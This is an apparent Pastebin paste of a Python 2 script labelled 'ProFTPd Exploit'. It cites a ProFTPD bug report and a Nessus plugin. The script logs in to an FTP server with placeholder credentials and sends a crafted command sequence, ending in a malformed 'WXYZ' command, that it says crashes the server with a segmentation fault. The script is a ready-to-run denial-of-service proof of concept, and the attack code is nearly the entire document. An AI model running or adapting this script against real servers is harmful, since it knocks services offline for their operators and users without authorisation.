Advertisement
Guest User

ProFTPdExploit

a guest
Apr 2nd, 2012
630
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.10 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. """
  4. ProFTPd Exploit
  5.  
  6. Advisory:
  7. http://bugs.proftpd.org/show_bug.cgi?id=3711
  8. Nessus:
  9. http://www.nessus.org/plugins/index.php?view=single&id=56956
  10.  
  11. Download:
  12. ftp://ftp1.at.proftpd.org/ProFTPD/distrib/source/
  13.  
  14. Credits:
  15. Ruben Garrote GarcĂ­a
  16. Twitter: @boken_
  17. http://boken00.blogspot.com - [email protected]
  18. """
  19.  
  20. # Parameters
  21. ftpServer = "192.168.1.10"
  22. ftpServerPort = 21
  23. ftpUsername = "user"
  24. ftpPassword = "password"
  25. ftpClient = "192.168.1.11"
  26. ftpClientPort = "1025"
  27.  
  28. # Commands to trigger the segmentation fault.
  29. ftpCommands = """USER %s
  30. PASS %s
  31. SYST
  32. TYPE A
  33. PORT %s,%s
  34. RETR nada
  35. WXYZ *Buguroo/
  36. QUIT
  37. """ % (ftpUsername, ftpPassword, ftpClient.replace('.',','), "%s,%s"%(("%04x"%int(ftpClientPort))[0:2],("%04x"%int(ftpClientPort))[2:4]))
  38.  
  39. import socket
  40.  
  41. # Open commands socket
  42. sc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  43. sc.connect((ftpServer,ftpServerPort))
  44.  
  45. # Will send FTP commands.
  46. for command in ftpCommands.split('\n'):
  47.     print sc.recv(1024),    
  48.     sc.send(command+'\r\n')
  49.     print command
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement